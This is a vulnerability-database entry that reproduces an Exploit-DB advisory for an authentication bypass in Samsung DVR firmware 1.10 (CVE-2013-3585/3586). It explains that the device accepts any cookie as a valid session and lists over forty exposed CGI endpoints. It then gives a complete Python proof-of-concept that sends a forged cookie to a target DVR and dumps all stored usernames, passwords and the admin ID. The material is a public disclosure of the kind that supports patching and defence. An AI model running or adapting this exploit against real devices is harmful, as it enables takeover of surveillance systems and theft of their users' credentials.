ID

VAR-E-201308-0457


CVE

cve_id:CVE-2013-3585

Trust: 1.6

cve_id:CVE-2013-3586

Trust: 1.0

sources: EXPLOIT-DB: 27753 // EDBNET: 49607

EDB ID

27753


TITLE

Samsung DVR Firmware 1.10 - Authentication Bypass - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 27753

DESCRIPTION

Samsung DVR Firmware 1.10 - Authentication Bypass. CVE-2013-3586CVE-2013-3585CVE-96510CVE-96509 . webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 27753

AFFECTED PRODUCTS

vendor:samsungmodel:dvrscope:eqversion:1.10

Trust: 1.6

sources: EXPLOIT-DB: 27753 // EDBNET: 49607

EXPLOIT

**************************************************************
Title: Samsung DVR authentication bypass
Version affected: firmware version <= 1.10
Vendor: Samsung - www.samsung-security.com
Discovered by: Andrea Fabrizi
Email: andrea.fabrizi@gmail.com
Web: http://www.andreafabrizi.it
Twitter: @andreaf83
Status: unpatched
**************************************************************

Samsung provides a wide range of DVR products, all working with nearly
the same firmware. The firmware it's a Linux embedded system that
expose a web interface through the lighttpd webserver and CGI pages.

The authenticated session is tracked using two cookies, called DATA1
and DATA2, containing respectively the base64 encoded username and
password. So, the first advise for the developers is to don't put the
user credentials into the cookies!

Anyway, the critical vulnerability is that in most of the CGI, the
session check is made in a wrong way, that allows to access protected
pages simply putting an arbitrary cookie into the HTTP request. Yes,
that's all.

This vulnerability allows remote unauthenticated users to:
- Get/set/delete username/password of local users (/cgi-bin/setup_user)
- Get/set DVR/Camera general configuration
- Get info about the device/storage
- Get/set the NTP server
- Get/set many other settings

Vulnerables CGIs:
- /cgi-bin/camera_privacy_area
- /cgi-bin/dev_camera
- /cgi-bin/dev_devinfo
- /cgi-bin/dev_devinfo2
- /cgi-bin/dev_hddalarm
- /cgi-bin/dev_modechange
- /cgi-bin/dev_monitor
- /cgi-bin/dev_pos
- /cgi-bin/dev_ptz
- /cgi-bin/dev_remote
- /cgi-bin/dev_spotout
- /cgi-bin/event_alarmsched
- /cgi-bin/event_motion_area
- /cgi-bin/event_motiondetect
- /cgi-bin/event_sensordetect
- /cgi-bin/event_tamper
- /cgi-bin/event_vldetect
- /cgi-bin/net_callback
- /cgi-bin/net_connmode
- /cgi-bin/net_ddns
- /cgi-bin/net_event
- /cgi-bin/net_group
- /cgi-bin/net_imagetrans
- /cgi-bin/net_recipient
- /cgi-bin/net_server
- /cgi-bin/net_snmp
- /cgi-bin/net_transprotocol
- /cgi-bin/net_user
- /cgi-bin/rec_event
- /cgi-bin/rec_eventrecduration
- /cgi-bin/rec_normal
- /cgi-bin/rec_recopt
- /cgi-bin/rec_recsched
- /cgi-bin/restart_page
- /cgi-bin/setup_admin_setup
- /cgi-bin/setup_datetimelang
- /cgi-bin/setup_group
- /cgi-bin/setup_holiday
- /cgi-bin/setup_ntp
- /cgi-bin/setup_systeminfo
- /cgi-bin/setup_user
- /cgi-bin/setup_userpwd
- /cgi-bin/webviewer

PoC exploit to list device users and password:
http://www.andreafabrizi.it/download.php?file=samsung_dvr.py
#!/usr/bin/env python
#
#**************************************************************
#Title: Samsung DVR authentication bypass
#Version affected: firmware version <= 1.10
#Vendor: Samsung - www.samsung-security.com
#Discovered by: Andrea Fabrizi
#Email: andrea.fabrizi@gmail.com
#Web: http://www.andreafabrizi.it
#Twitter: @andreaf83
#Status: unpatched
#**************************************************************

import urllib2
import re
import sys

if __name__ == "__main__":

if len(sys.argv) != 2:
print "usage: %s [TARGET]" % sys.argv[0]
sys.exit(1)

ip = sys.argv[1]
headers = {"Cookie" : "DATA1=YWFhYWFhYWFhYQ==" }

print "SAMSUNG DVR Authentication Bypass"
print "Vulnerability and exploit by Andrea Fabrizi <andrea.fabrizi@gmail.com>\n"
print "Target => %s\n" % ip

#Dumping users
print "##### DUMPING USERS ####"
req = urllib2.Request("http://%s/cgi-bin/setup_user" % ip, None, headers)
response = urllib2.urlopen(req)
user_found = False

for line in response.readlines():

exp = re.search(".*<input type=\'hidden\' name=\'nameUser_Name_[0-9]*\' value=\'(.*)\'.*", line)
if exp:
print exp.group(1),

exp = re.search(".*<input type=\'hidden\' name=\'nameUser_Pw_[0-9]*\' value=\'(.*)\'.*", line)
if exp:
print ": " + exp.group(1)
user_found = True

exp = re.search(".*<input type=hidden name=\'admin_id\' value=\'(.*)\'.*", line)
if exp:
print "Admin ID => %s" % exp.group(1)


if not user_found:
print "No user found."

Trust: 1.0

sources: EXPLOIT-DB: 27753

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 27753

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 27753

TYPE

Authentication Bypass

Trust: 1.6

sources: EXPLOIT-DB: 27753 // EDBNET: 49607

CREDITS

Andrea Fabrizi

Trust: 0.6

sources: EXPLOIT-DB: 27753

EXTERNAL IDS

db:NVDid:CVE-2013-3585

Trust: 1.6

db:EXPLOIT-DBid:27753

Trust: 1.6

db:NVDid:CVE-2013-3586

Trust: 1.0

db:EDBNETid:49607

Trust: 0.6

sources: EXPLOIT-DB: 27753 // EDBNET: 49607

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2013-3585

Trust: 1.6

url:https://nvd.nist.gov/vuln/detail/cve-2013-3586

Trust: 1.0

url:https://www.exploit-db.com/exploits/27753/

Trust: 0.6

sources: EXPLOIT-DB: 27753 // EDBNET: 49607

SOURCES

db:EXPLOIT-DBid:27753
db:EDBNETid:49607

LAST UPDATE DATE

2022-07-27T09:47:31.112000+00:00


SOURCES RELEASE DATE

db:EXPLOIT-DBid:27753date:2013-08-21T00:00:00
db:EDBNETid:49607date:2013-08-21T00:00:00